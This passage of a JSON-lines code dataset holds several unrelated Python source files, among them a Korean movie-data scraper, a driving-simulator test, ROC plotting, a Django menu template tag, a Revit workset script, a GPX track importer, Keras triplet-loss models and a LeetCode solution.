찾기 위한 코드.\n \"\"\"\n SEARCH_BASE_url = f'{NAVER_MOVIE_BASE_URL}/search/result.nhn?query={daily[\"movieNm\"]}§ion=all&ie=utf8'\n SEARCH_BASE_selector = '#old_content > ul.search_list_1 > li > dl > dt > a'\n SEARCH_BASE_result = beautify(SEARCH_BASE_url, SEARCH_BASE_selector).get('href')\n\n\n\n # 찾은 영화에서 데이터 추출(basic)\n SEARCH_BASIC_url = f'{NAVER_MOVIE_BASE_URL}{SEARCH_BASE_result}'\n SEARCH_BASIC_selector_posterUrl = '#content > div.article > div.mv_info_area > div.poster > a > img'\n SEARCH_BASIC_selector_description = '#content > div.article > div.section_group.section_group_frst > div:nth-child(1) > div > div.story_area > p'\n SEARCH_BASIC_selector_score = '#actualPointPersentBasic > div > span > span'\n\n posterUrl = beautify(SEARCH_BASIC_url, SEARCH_BASIC_selector_posterUrl).get('src')\n description = trimming(beautify(SEARCH_BASIC_url, SEARCH_BASIC_selector_description).text)\n score = get_score_or_0(beautify(SEARCH_BASIC_url, SEARCH_BASIC_selector_score))\n\n save_data(\"posterUrl\", posterUrl)\n save_data(\"description\", description)\n save_data(\"score\", score)\n\n\n\n # 찾은 영화에서 데이터 추출(photoView)\n SEARCH_PHOTOVIEW_stillCut = SEARCH_BASIC_url.replace('basic','photoView')\n \n stillCuts = []\n for i in range(1,4):\n SEARCH_PHOTOVIEW_selector_stillCut = f'#photo_area > div > div.list_area._list_area > div > ul > li:nth-child({i})'\n stillCut = json.loads(beautify(SEARCH_PHOTOVIEW_stillCut,SEARCH_PHOTOVIEW_selector_stillCut).get('data-json'))['fullImageUrl665px']\n stillCuts.append(stillCut)\n save_data(\"stillCuts\", stillCuts)\n\n\n # Youtube에서 트레일러 ID 가져오기\n trailer = get_trailer()\n save_data('trailer', trailer)\n\n\n\n # daily 결과 값 예시\n \"\"\"\n ex. daily\n {\n \"rnum\": \"1\",\n \"rank\": \"1\",\n \"rankInten\": \"0\",\n \"rankOldAndNew\": \"OLD\",\n # \"movieCd\": \"20184889\",\n # \"movieNm\": \"어벤져스: 엔드게임\",\n # \"openDt\": \"20190424\",\n \"salesAmt\": \"738244210\",\n \"salesShare\": \"39.8\",\n \"salesInten\": \"-1923986000\",\n \"salesChange\": \"-72.3\",\n \"salesAcc\": \"112507888440\",\n \"audiCnt\": \"82379\",\n \"audiInten\": \"-208402\",\n \"audiChange\": \"-71.7\",\n # \"audiAcc\": \"12882040\",\n \"scrnCnt\": \"1537\",\n \"showCnt\": \"5771\",\n # \"movieNmEn\": \"Avengers: Endgame\",\n \"movieNmOg\": \"\",\n # \"showTm\": \"180\",\n \"prdtYear\": \"2018\",\n \"prdtStatNm\": \"개봉\",\n \"typeNm\": \"장편\",\n # \"nations\": [\n # {\n # \"nationNm\": \"미국\"\n # }\n # ],\n # \"genres\": [\n # {\n # \"genreNm\": \"액션\"\n # },\n # {\n # \"genreNm\": \"SF\"\n # }\n # ],\n # \"directors\": [\n # {\n # \"peopleNm\": \"안소니 루소\",\n # \"peopleNmEn\": \"Anthony Russo\"\n # },\n # {\n # \"peopleNm\": \"조 루소\",\n # \"peopleNmEn\": \"Joe Russo\"\n # }\n # ],\n # \"actors\": [\n # {\n # \"peopleNm\": \"로버트 다우니 주니어\",\n # \"peopleNmEn\": \"Robert Downey Jr.\",\n # \"cast\": \"\",\n # \"castEn\": \"\"\n # },\n # {\n # \"peopleNm\": \"크리스 에반스\",\n # \"peopleNmEn\": \"Chris Evans\",\n # \"cast\": \"\",\n # \"castEn\": \"\"\n # },\n # {\n # \"peopleNm\": \"마크 러팔로\",\n # \"peopleNmEn\": \"Mark Ruffalo\",\n # \"cast\": \"\",\n # \"castEn\": \"\"\n # },\n # {\n # \"peopleNm\": \"크리스 헴스워스\",\n # \"peopleNmEn\": \"Chris Hemsworth\",\n # \"cast\": \"\",\n # \"castEn\": \"\"\n # },\n # {\n # \"peopleNm\": \"스칼렛 요한슨\",\n # \"peopleNmEn\": \"Scarlett Johansson\",\n # \"cast\": \"\",\n # \"castEn\": \"\"\n # },\n # {\n # \"peopleNm\": \"제레미 레너\",\n # \"peopleNmEn\": \"Jeremy Renner\",\n # \"cast\": \"\",\n # \"castEn\": \"\"\n # },\n # {\n # \"peopleNm\": \"돈 치들\",\n # \"peopleNmEn\": \"Don Cheadle\",\n # \"cast\": \"\",\n # \"castEn\": \"\"\n # },\n # {\n # \"peopleNm\": \"폴 러드\",\n # \"peopleNmEn\": \"Paul Rudd\",\n # \"cast\": \"\",\n # \"castEn\": \"\"\n # },\n # {\n # \"peopleNm\": \"브리 라슨\",\n # \"peopleNmEn\": \"Brie Larson\",\n # \"cast\": \"\",\n # \"castEn\": \"\"\n # },\n # {\n # \"peopleNm\": \"카렌 길런\",\n # \"peopleNmEn\": \"Karen Gillan\",\n # \"cast\": \"\",\n # \"castEn\": \"\"\n # },\n # {\n # \"peopleNm\": \"브래들리 쿠퍼\",\n # \"peopleNmEn\": \"Bradley Cooper\",\n # \"cast\": \"\",\n # \"castEn\": \"\"\n # },\n # {\n # \"peopleNm\": \"조슈 브롤린\",\n # \"peopleNmEn\": \"Josh Brolin\",\n # \"cast\": \"\",\n # \"castEn\": \"\"\n # }\n # ],\n \"showTypes\": [\n {\n \"showTypeGroupNm\": \"2D\",\n \"showTypeNm\": \"디지털\"\n },\n {\n \"showTypeGroupNm\": \"3D\",\n \"showTypeNm\": \"3D 디지털\"\n },\n {\n \"showTypeGroupNm\": \"4D\",\n \"showTypeNm\": \"4D\"\n },\n {\n \"showTypeGroupNm\": \"IMAX\",\n \"showTypeNm\": \"IMAX\"\n },\n {\n \"showTypeGroupNm\": \"IMAX\",\n \"showTypeNm\": \"IMAX 3D\"\n }\n ],\n \"companys\": [\n {\n \"companyCd\": \"20161801\",\n \"companyNm\": \"월트디즈니컴퍼니코리아 유한책임회사\",\n \"companyNmEn\": \"The Walt Disney Company Korea\",\n \"companyPartNm\": \"배급사\"\n },\n {\n \"companyCd\": \"20161801\",\n \"companyNm\": \"월트디즈니컴퍼니코리아 유한책임회사\",\n \"companyNmEn\": \"The Walt Disney Company Korea\",\n \"companyPartNm\": \"수입사\"\n }\n ],\n \"audits\": [\n {\n \"auditNo\": \"2019-MF00676\",\n \"watchGradeNm\": \"12세이상관람가\"\n },\n {\n \"auditNo\": \"2019-MF00709\",\n \"watchGradeNm\": \"12세이상관람가\"\n }\n ],\n \"staffs\": [],\n # \"posterUrl\": \"https: //movie-phinf.pstatic.net/20190417_250/1555465284425i6WQE_JPEG/movie_image.jpg?type=m203_290_2\",\n # \"description\": \"인피니티 워 이후 절반만 살아남은 지구 마지막 희망이 된 어벤져스 먼저 떠난 그들을 위해 모든 것을 걸었다! 위대한 어벤져스 운명을 바꿀 최후의 전쟁이 펼쳐진다!\",\n # \"score\": \"9.51\",\n # \"stillCuts\": [\n # \"https://movie-phinf.pstatic.net/20190423_104/1555994321040d2AcJ_JPEG/movie_image.jpg?type=m665_443_2\",\n # \"https://movie-phinf.pstatic.net/20190423_5/1555994321522brgKj_JPEG/movie_image.jpg?type=m665_443_2\",\n # \"https://movie-phinf.pstatic.net/20190423_41/1555994321935RJdum_JPEG/movie_image.jpg?type=m665_443_2\"\n # ],\n # \"trailer\": \"TcMBFSGVi1c\"\n }\n \"\"\"\n\nmovie_dics = []\nmovie_genre_dics = []\nmovie_nation_dics = []\nmovie_director_dics = []\nmovie_actor_dics = []\nmovie_stillCut_dics = []\nfor i in range(len(daily_lists)):\n genre_lists = []\n nation_lists = []\n director_lists = []\n actor_lists = []\n stillCut_lists = []\n movie = {\n \"pk\": i + 41,\n \"model\": \"movies.movie\",\n \"fields\": {\n \"movieCd\": daily_lists[i][\"movieCd\"],\n \"movieNm\": daily_lists[i][\"movieNm\"],\n \"openDt\": daily_lists[i][\"openDt\"],\n \"audiAcc\": daily_lists[i][\"audiAcc\"],\n \"movieNmEn\": daily_lists[i][\"movieNmEn\"],\n \"showTm\": daily_lists[i][\"showTm\"],\n \"posterUrl\": daily_lists[i][\"posterUrl\"],\n \"description\": daily_lists[i][\"description\"],\n \"score\": daily_lists[i][\"score\"],\n \"trailer\": daily_lists[i][\"trailer\"]\n }\n }\n movie_dics.append(movie)\n \n for j in range(len(daily_lists[i][\"genres\"])):\n genre = daily_lists[i][\"genres\"][j][\"genreNm\"]\n if genre not in genre_lists:\n genre_lists.append(genre)\n movie_genre_dics.append(genre_lists)\n \n for k in range(len(daily_lists[i][\"nations\"])):\n nation = daily_lists[i][\"nations\"][k][\"nationNm\"]\n if nation not in nation_lists:\n nation_lists.append(nation)\n movie_nation_dics.append(nation_lists)\n \n for x in range(len(daily_lists[i][\"directors\"])):\n director = daily_lists[i][\"directors\"][x][\"peopleNm\"]\n if director not in director_lists:\n director_lists.append(director)\n movie_director_dics.append(director_lists)\n \n for y in range(len(daily_lists[i][\"actors\"])):\n actor = daily_lists[i][\"actors\"][y][\"peopleNm\"]\n if actor not in actor_lists:\n actor_lists.append(actor)\n movie_actor_dics.append(actor_lists)\n \n for z in range(len(daily_lists[i][\"stillCuts\"])):\n stillCut = daily_lists[i][\"stillCuts\"][z]\n stillCut_lists.append(stillCut) \n movie_stillCut_dics.append(stillCut_lists)\n \n \nprint(movie_dics,end=\"\\n\")\nprint(movie_genre_dics,end=\"\\n\")\nprint(movie_nation_dics,end=\"\\n\")\nprint(movie_director_dics,end=\"\\n\")\nprint(movie_actor_dics,end=\"\\n\")\nprint(movie_stillCut_dics,end=\"\\n\")\n\n\n# print(list(enumerate(movie_genre_dics, 41)),end='\\n')\n# print(list(enumerate(movie_nation_dics, 41)),end='\\n')\n# print(list(enumerate(movie_director_dics, 41)),end='\\n')\n# print(list(enumerate(movie_actor_dics, 41)),end='\\n')\n# print(list(enumerate(movie_stillCut_dics, 41)),end='\\n')","sub_path":"movies/API_CALL/KOFIC/get_daily_list.py","file_name":"get_daily_list.py","file_ext":"py","file_size_in_byte":13653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"595785511","text":"import gym\nimport gym_urbandriving as uds\nimport cProfile\nimport time\nimport numpy as np\nfrom copy import deepcopy\n\nfrom gym_urbandriving.agents import NullAgent, TrafficLightAgent, ControlAgent\nfrom gym_urbandriving.planning import RRTMPlanner\nfrom gym_urbandriving.assets import Car, TrafficLight\n\nNUM_CARS = 2\n\n\"\"\"\n Test File, to demonstrate general functionality of environment\n\"\"\"\n\ndef f():\n # Instantiate a PyGame Visualizer of size 800x800\n vis = uds.PyGameVisualizer((800, 800))\n\n # Create a simple-intersection state, with cars, no pedestrians, and traffic lights\n init_state = uds.state.SimpleIntersectionState(ncars=NUM_CARS, nped=0, traffic_lights=True)\n\n # Create the world environment initialized to the starting state\n # Specify the max time the environment will run to 500\n # Randomize the environment when env._reset() is called\n # Specify what types of agents will control cars and traffic lights\n # Use ray for multiagent parallelism\n env = uds.UrbanDrivingEnv(init_state=init_state,\n visualizer=vis,\n max_time=500,\n randomize=True,\n agent_mappings={Car:NullAgent,\n TrafficLight:TrafficLightAgent},\n use_ray=False\n )\n\n state = env.current_state\n agents = []\n\n for i in range(NUM_CARS):\n agents.append(ControlAgent(i))\n\n planner = RRTMPlanner(agents, planner='SST')\n plans = planner.plan(deepcopy(state))\n for i in range(NUM_CARS):\n state.dynamic_objects[i].trajectory = plans[i]\n\n\n action = None\n\n # Simulation loop\n while(True):\n # Determine an action based on the current state.\n # For KeyboardAgent, this just gets keypresses\n start_time = time.time()\n i = 0 \n\n actions = []\n for agent in agents:\n action = agent.eval_policy(state)\n actions.append(action)\n state, reward, done, info_dict = env._step_test(actions)\n \n # Simulate the state\n \n env._render()\n # keep simulator running in spite of collisions or timing out\n done = False\n # If we crash, sleep for a moment, then reset\n if done:\n print(\"done\")\n time.sleep(1)\n env._reset()\n state = env.current_state\n\n# Collect profiling data\ncProfile.run('f()', 'temp/stats')\n","sub_path":"examples/rrt_multi_test.py","file_name":"rrt_multi_test.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"97008856","text":"import seamless\nfrom seamless.core import context, cell, transformer\n\nseamless.database.connect()\n\nctx = context(toplevel=True)\n\ndef func(a, b):\n import time\n time.sleep(3)\n return a + b + 0.5\nctx.a = cell().set(1)\nctx.b = cell().set(2)\nctx.tf = transformer({\n \"a\": \"input\",\n \"b\": \"input\",\n \"result\": \"output\"\n})\nctx.result = cell()\nctx.code = cell(\"python\").set(func)\nctx.a.connect(ctx.tf.a)\nctx.b.connect(ctx.tf.b)\nctx.code.connect(ctx.tf.code)\nctx.tf.result.connect(ctx.result)\nctx.compute()\nprint(ctx.status)\nprint(ctx.tf.exception)\nctx.save_vault(\"./reuse-vault\")","sub_path":"tests/lowlevel/reuse1.py","file_name":"reuse1.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"63366951","text":"import argparse\nimport matplotlib; matplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport os\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-r', '--rate', type=int, required=True,\n help='Payload rate (1=constant, 2=sqrt, 3=sqrt*log, 4=linear)')\nparser.add_argument(\"-t\", \"--with-title\", action='store_true',\n help=\"Include graph title\")\nargs = parser.parse_args()\n\nnum_sizes = 10\n# light pink, pink, purple, dark blue, light blue, cyan, green, yellow, orange,\n# red\ncolours = ['#F56EF6', '#9400D3', '#4B0082', '#0000FF', '#4FA1FD', '#00FFFF',\n '#00FF00', '#E6C900', '#FF7F00', '#FF0000']\nsizes = [320, 1056, 1472, 1792, 2048, 2304, 2528, 2720, 2912, 3072]\npayloads_1 = [49176] * num_sizes\npayloads_2 = [7683, 25356, 35345, 43029, 49176, 55323, 60702, 65312, 59922,\n 73764]\npayloads_3 = [5777, 23111, 33785, 42261, 49176, 56194, 62410, 67790, 73212,\n 77762]\npayloads_4 = [1200, 13074, 25404, 37650, 49176, 62239, 74929, 86743, 99421,\n 110647]\n\ngraph_title = ''\nfile_desc = ''\npayloads = []\nif args.rate == 1:\n payloads = payloads_1\n graph_title = 'Constant payload'\n file_desc = 'constant'\nelif args.rate == 2:\n payloads = payloads_2\n graph_title = r'Payload $\\propto \\sqrt{N}$'\n file_desc = 'sqrt'\nelif args.rate == 3:\n payloads = payloads_3\n graph_title = r'Payload $\\propto \\sqrt{N} \\cdot \\log{N}$'\n file_desc = 'sqrt_log'\nelse:\n payloads = payloads_4\n graph_title = r'Payload $\\propto N$'\n file_desc = 'linear'\n\n# Create plot\nplt.figure(figsize=(7,7))\n\n# Add curves to the plot\nfor i in range(0, num_sizes):\n roc_points_filename = \\\n 'roc/points/size{:d}_binary_{:d}b_roc.txt'.format(sizes[i], payloads[i])\n with open(roc_points_filename, 'r') as roc_points_file:\n lines = roc_points_file.readlines()\n x = []\n y = []\n min_pe_index = int(lines[-1]) - 1 # MATLAB is 1-indexed\n\n # Loop through all except the last line (which contains minPE index)\n for line in lines[:-1]:\n values = line.rstrip().split()\n x.append(float(values[0]))\n y.append(float(values[1]))\n\n plt.plot(x, y, color=colours[i], label=str(sizes[i]))\n plt.plot(x[min_pe_index], y[min_pe_index], color='k', marker='o',\n markersize=8)\n\n# Plot ROC curve of a random classifier for reference\nplt.plot([0.0,1.0], [0.0,1.0], color='#696969', linestyle='dashed')\n\nplt.xlabel(r'$f_p$')\nplt.ylabel(r'$1-f_n$')\nif args.with_title:\n plt.title(graph_title)\n\n# Place legend in bottom-right corner of plot\nplt.legend(loc='lower right', bbox_to_anchor=(1.0, 0.0))\n\n# Save plot\nplt.savefig('roc/curves/actor3_roc_{}_small_constant.png'.format(file_desc))\n","sub_path":"results/actor3_plot_roc_curves_small_constant.py","file_name":"actor3_plot_roc_curves_small_constant.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"602257667","text":"from django import template\nfrom product.models import Category\nfrom django.urls import reverse\n\nregister = template.Library()\n@register.simple_tag\ndef categorylist():\n return Category.objects.all()\n\n\n@register.simple_tag\ndef categoryTree(id,menu):\n if id <= 0:\n query = Category.objects.filter(parent_id__isnull=True).order_by(\"id\")\n querycount = query.count()\n else:\n query = Category.objects.filter(parent_id=id)\n querycount = query.count() \n\n if querycount > 0:\n for rs in query:\n subcount = Category.objects.filter(parent_id=rs.id).count()\n if subcount > 0:\n menu += '\\t
  • \\n'\n menu += '\\t'+ rs.title +'\\n'\n menu += '\\t\\t
    \\n'\n menu += '\\t\\t\\t
      \\n'\n menu += categoryTree(int(rs.id),'')\n menu += '\\t\\t\\t
    \\n'\n menu += '\\t\\t
    \\n'\n menu += \"\\t
  • \\n\\n\"\n else :\n menu += '\\t\\t\\t\\t
  • ' + rs.title + '
  • \\n'\n return menu\n","sub_path":"home/templatetags/myapptags.py","file_name":"myapptags.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"418891090","text":"__title__ = \"Workset by Category\"\n__doc__ = \"Appoints elements to worksets by category. Works only with ungrouped elements. Supports only common architectural categories\"\n\nfrom pyrevit import revit, DB, script, forms\n\ndef check_ungrouped():\n # Check that all elements have been ungrouped\n coll_groups = DB.FilteredElementCollector(revit.doc) \\\n .OfClass(DB.Group) \\\n .WhereElementIsNotElementType() \\\n .ToElements()\n if coll_groups:\n forms.alert(\"Ungroup elements first\", warn_icon=True)\n return False\n return True\n\ncat_dict = {\n \"Wall\": DB.BuiltInCategory.OST_Walls,\n \"Window\": DB.BuiltInCategory.OST_Windows,\n \"Floor\": DB.BuiltInCategory.OST_Floors,\n \"Slab\": DB.BuiltInCategory.OST_Floors,\n \"Stair\": DB.BuiltInCategory.OST_Stairs,\n \"Railing\": DB.BuiltInCategory.OST_StairsRailing,\n \"Doors\": DB.BuiltInCategory.OST_Doors,\n \"Furniture\": DB.BuiltInCategory.OST_Furniture,\n \"Plumbing\": DB.BuiltInCategory.OST_PlumbingFixtures,\n \"Roof\": DB.BuiltInCategory.OST_Roofs,\n \"Ceiling\": DB.BuiltInCategory.OST_Ceilings,\n}\n\n\n# Check model is workshared\nif forms.check_workshared(revit.doc, 'Model is not workshared.'):\n # Check all elements are ungrouped\n if check_ungrouped():\n\n # Collect all worksets in model with Filtered Workset Collector\n coll_worksets = DB.FilteredWorksetCollector(revit.doc).OfKind(DB.WorksetKind.UserWorkset)\n\n # Iterate through categories in dictionary\n\n for keyword in cat_dict:\n with revit.Transaction(keyword, revit.doc):\n for ws in coll_worksets:\n # check for keyword in workset name\n if keyword in ws.Name or keyword.upper() in ws.Name or keyword.lower() in ws.Name:\n\n # inverted workset filter - pick up elements that are not in workset\n ws_filter = DB.ElementWorksetFilter(ws.Id, True)\n # collect all elements of category\n coll_elements = DB.FilteredElementCollector(revit.doc) \\\n .OfCategory(cat_dict[keyword]) \\\n .WherePasses(ws_filter) \\\n .WhereElementIsNotElementType() \\\n .ToElements()\n\n counter = 0\n for w in coll_elements:\n # for each element get workset parameter\n w_param = w.get_Parameter(DB.BuiltInParameter.ELEM_PARTITION_PARAM)\n if not w_param.IsReadOnly: # don't touch elements with read-only parameter\n try:\n w_param.Set(ws.Id.IntegerValue) # set workset\n counter += 1\n finally:\n pass\n # annotate process\n print(\"Sorted {} elements to workset {}\".format(counter, ws.Name))","sub_path":"pyChilizer.tab/Tiny Tools.panel/Cleanup Tools.pulldown/Workset by Category.pushbutton/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":3046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"232844437","text":"\"\"\"\n Утилита для экспортирования точек из XML в БД.\n\"\"\"\n\nimport sys\nimport connection\nimport argparse\nimport xml.etree.ElementTree as etree\n\n\nxmlnm = 'http://www.topografix.com/GPX/1/0'\n\n\ndef runImport(track, trackId, printFlag):\n conn = connection.Connection()\n conn.openAll()\n\n iteration = 0\n\n sql = \"\"\"\n INSERT INTO device.tracks(track_id, lon, lat, speed, bearing, ts, the_geom)\n VALUES(%(id)s, %(lon)s, %(lat)s, %(speed)s, %(bearing)s, %(ts)s,\n ST_Transform(ST_SetSrid(ST_MakePoint(%(lon)s, %(lat)s), 4326), 3857))\n \"\"\"\n\n for point in track:\n lon, lat = point.attrib['lon'], point.attrib['lat']\n\n speedXml = point.findall('{%s}speed' % xmlnm)\n if len(speedXml) == 0:\n continue\n\n speed = float(speedXml[0].text)\n\n bearingXml = point.findall('{%s}course' % xmlnm)\n if len(bearingXml) == 0:\n continue\n\n bearing = bearingXml[0].text\n\n tsXml = point.findall('{%s}time' % xmlnm)\n ts = tsXml[0].text\n\n conn.execute(sql, {'id': trackId, 'lon': lon, 'lat': lat, 'speed': speed,\n 'bearing': bearing, 'ts': ts})\n\n if printFlag:\n print('Point №', iteration)\n\n iteration += 1\n\n conn.commit()\n\n print('Track successfully imported to database')\n\n\nif __name__ == '__main__':\n argsParser = argparse.ArgumentParser()\n\n argsParser.add_argument('-print', dest='isPrint', type=bool, default=False)\n argsParser.add_argument('-id', dest='id', type=str, required=True)\n argsParser.add_argument('-file', dest='file', type=str, required=True)\n\n args = argsParser.parse_args()\n\n tree = etree.parse(args.file)\n\n root = tree.getroot()\n\n trk = root.findall('{%s}trk' % xmlnm)[0]\n trkseq = trk.findall('{%s}trkseg' % xmlnm)[0]\n\n runImport(trkseq, args.id if args.id else args.file[:9], args.isPrint)\n","sub_path":"tools/xml_track_to_bd.py","file_name":"xml_track_to_bd.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"618404629","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Python中怎么创建闭包?\n# 在Python中创建一个闭包可以归结为以下三点:\n# 1.闭包函数必须有内嵌函数\n# 2.内嵌函数需要引用该嵌套函数上一级namespace中的变量\n# 3.闭包函数必须返回内嵌函数\n\n# 1.返回闭包时牢记一点:返回函数不要引用任何循环变量,或者后续会发生变化的变量。\ndef count():\n def f(j):\n def g():\n return j*j\n return g\n fs = []\n for i in range(1, 4):\n fs.append(f(i)) # f(i)立刻被执行,因此i的当前值被传入f()\n return fs\n# 测试\nf1, f2, f3 = count()\nprint(f1())\nprint(f2())\nprint(f3())\n\n\n# 2.利用闭包返回一个计数器函数,每次调用它返回递增整数\ndef createCounter():\n def fun1():\n n = 0\n while True:\n n = n + 1\n yield n\n it = fun1()\n def fun2():\n return next(it)\n return fun2\n# 测试\n# 测试:\ncounterA = createCounter()\nprint(counterA(), counterA(), counterA(), counterA(), counterA()) # 1 2 3 4 5\ncounterB = createCounter()\nif [counterB(), counterB(), counterB(), counterB()] == [1, 2, 3, 4]:\n print('测试通过!')\nelse:\n print('测试失败!')\n","sub_path":"functional_programing/closureDemo.py","file_name":"closureDemo.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"182313830","text":"\nimport numpy as np\nimport random\nimport sys\nimport io\nimport os\nimport glob\n\nfrom keras.callbacks import ModelCheckpoint\nfrom keras.models import Model, load_model, Sequential\nfrom keras.layers import Dense, Activation, Dropout, Input, Masking, TimeDistributed, LSTM, Conv1D, Flatten\nfrom keras.layers import GRU, Bidirectional, BatchNormalization, Reshape, Concatenate,concatenate, Average\nfrom keras.optimizers import Adam\nfrom keras import backend as K\nfrom keras.models import load_model\nimport tensorflow as tf\n\n\ndef five_average_model(input_shape,base_model):\n model_inputs = []\n model_results = []\n for i in range(5):\n X_input = Input(shape = input_shape, name = \"Input\"+ str(i))\n model_inputs.append(X_input)\n result = base_model(X_input)\n model_results.append(result)\n \n X = Average()(model_results)\n model = Model(inputs = model_inputs,outputs = X)\n \n return model\n\ndef cosine_similarity(u, v):\n \"\"\"\n Cosine similarity reflects the degree of similariy between u and v\n \n Arguments:\n u -- a word vector of shape (n,) \n v -- a word vector of shape (n,)\n\n Returns:\n cosine_similarity -- the cosine similarity between u and v defined by the formula above.\n \"\"\"\n \n distance = 0.0\n \n dot = np.dot(u,v)\n norm_u = np.linalg.norm(u)\n norm_v = np.linalg.norm(v)\n cosine_similarity = dot/(norm_u*norm_v)\n \n return cosine_similarity\n\n \ndef triplet_loss(y_true, y_pred, alpha = 0.35):\n \"\"\"\n Implementation of the triplet loss as defined by formula (3)\n \n Arguments:\n y_true -- true labels, required when you define a loss in Keras, you don't need it in this function.\n y_pred -- python list containing three objects:\n anchor -- the encodings for the anchor images, of shape (None, 128)\n positive -- the encodings for the positive images, of shape (None, 128)\n negative -- the encodings for the negative images, of shape (None, 128)\n \n Returns:\n loss -- real number, value of the loss\n \"\"\"\n total_lenght = 64*3\n anchor, positive, negative = y_pred[:,0:int(total_lenght*1/3)],y_pred[:,int(total_lenght*1/3):int(total_lenght*2/3)],y_pred[:,int(total_lenght*2/3):int(total_lenght*3/3)]\n\n pos_dist = K.sum(K.square(anchor-positive),axis=1)\n\n neg_dist = K.sum(K.square(anchor-negative),axis=1)\n\n basic_loss = pos_dist-neg_dist+alpha\n loss = K.sum(K.maximum(basic_loss,0.0))\n \n return loss\n \ndef base_model(input_shape):\n \"\"\"\n Function creating the model's graph in Keras.\n \n Argument:\n input_shape -- shape of the model's input data (using Keras conventions)\n\n Returns:\n model -- Keras model instance\n \"\"\"\n \n X_input = Input(shape = input_shape)\n \n X = Conv1D(196,kernel_size = 15, strides = 4)(X_input)\n X = Activation('relu')(X) \n X = Dropout(rate = 0.2)(X) \n \n X = LSTM(units = 128, return_sequences = True)(X_input) \n X = Dropout(rate = 0.2)(X) \n \n X = LSTM(units = 128, return_sequences = True)(X) \n X = Dropout(rate = 0.2)(X) \n \n X = LSTM(units = 128)(X) \n X = Dropout(rate = 0.2)(X) \n \n X = Dense(64)(X)\n \n base_model = Model(inputs = X_input, outputs = X)\n\n return base_model \n \ndef speech_model(input_shape, average_model):\n \"\"\"\n Function creating the model's graph in Keras.\n \n Argument:\n input_shape -- shape of the model's input data (using Keras conventions)\n base_model -- model to be used to call the inputs\n\n Returns:\n model -- Keras model instance\n \"\"\"\n \n #get triplets vectors\n input_anchor = []\n input_positive = []\n input_negative = []\n for i in range(15):\n X_input = Input(shape = input_shape, name = \"Input\"+ str(i))\n if (i < 5):\n input_anchor.append(X_input)\n elif (i < 10):\n input_positive.append(X_input)\n elif(i < 15):\n input_negative.append(X_input)\n \n vec_anchor = average_model(input_anchor)\n vec_positive = average_model(input_positive)\n vec_negative = average_model(input_negative)\n \n #Concatenate vectors vec_positive, vec_negative\n concat_layer = concatenate([vec_anchor,vec_positive,vec_negative], axis = -1, name='concat_layer')\n \n model = Model(inputs = input_anchor + input_positive + input_negative, outputs = concat_layer, name = 'speech_to_vec')\n \n \n return model \n\ndef load_model_with_path(model_path):\n return load_model(model_path)\n\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"476435515","text":"\"\"\"\n实现 strStr() 函数。\n\n给定一个 haystack 字符串和一个 needle 字符串,在 haystack 字符串中找出 needle 字符串出现的第一个位置 (从0开始)。如果不存在,则返回 -1。\n\n示例 1:\n\n输入: haystack = \"hello\", needle = \"ll\"\n输出: 2\n示例 2:\n\n输入: haystack = \"aaaaa\", needle = \"bba\"\n输出: -1\n说明:\n\n当 needle 是空字符串时,我们应当返回什么值呢?这是一个在面试中很好的问题。\n\n对于本题而言,当 needle 是空字符串时我们应当返回 0 。这与C语言的 strstr() 以及 Java的 indexOf() 定义相符。\n\"\"\"\n\n\nclass Solution:\n def strStr(self, haystack, needle):\n \"\"\"\n :type haystack: str\n :type needle: str\n :rtype: int\n \"\"\"\n if len(needle) == 0:\n return 0\n l1 = len(haystack)\n l2 = len(needle)\n if l1 < l2:\n return -1\n for i in range(l1-l2+1):\n if haystack[i] == needle[0]:\n t = 1\n for j in range(l2): # 首个字母匹配上之后,从此位置按照needle字符串循环验证\n if needle[j] != haystack[i+j]:\n t = 0\n break\n if t == 0:\n pass\n else:\n return i\n return -1\n","sub_path":"LeetCode/esay/028_Implement strStr().py","file_name":"028_Implement strStr().py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"119998510","text":"# Copyright (c) 2019 SAP SE or an SAP affiliate company. All rights reserved. This file is licensed\n# under the Apache Software License, v. 2 except as noted otherwise in the LICENSE file\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom concurrent.futures import ThreadPoolExecutor\nimport sys\nimport tabulate\nimport typing\n\nimport requests.exceptions\n\nimport protecode.client\nfrom product.scanning import ProtecodeUtil, ProcessingMode\nfrom util import info, warning, verbose, error\nfrom product.model import (\n UploadResult,\n)\nfrom protecode.model import (\n AnalysisResult,\n License,\n highest_major_cve_severity,\n)\n\n\ndef upload_images(\n protecode_cfg,\n product_descriptor,\n protecode_group_id=5,\n parallel_jobs=8,\n cve_threshold=7,\n ignore_if_triaged=True,\n processing_mode=ProcessingMode.UPLOAD_IF_CHANGED,\n image_reference_filter=lambda _: 